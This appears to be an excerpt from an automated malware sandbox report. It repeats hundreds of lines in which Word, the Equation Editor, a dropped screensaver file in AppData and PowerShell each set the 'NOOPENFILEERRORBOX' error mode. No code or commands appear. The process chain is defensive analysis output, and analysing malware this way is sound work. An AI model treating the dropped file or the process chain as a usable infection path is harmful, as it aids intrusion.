                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
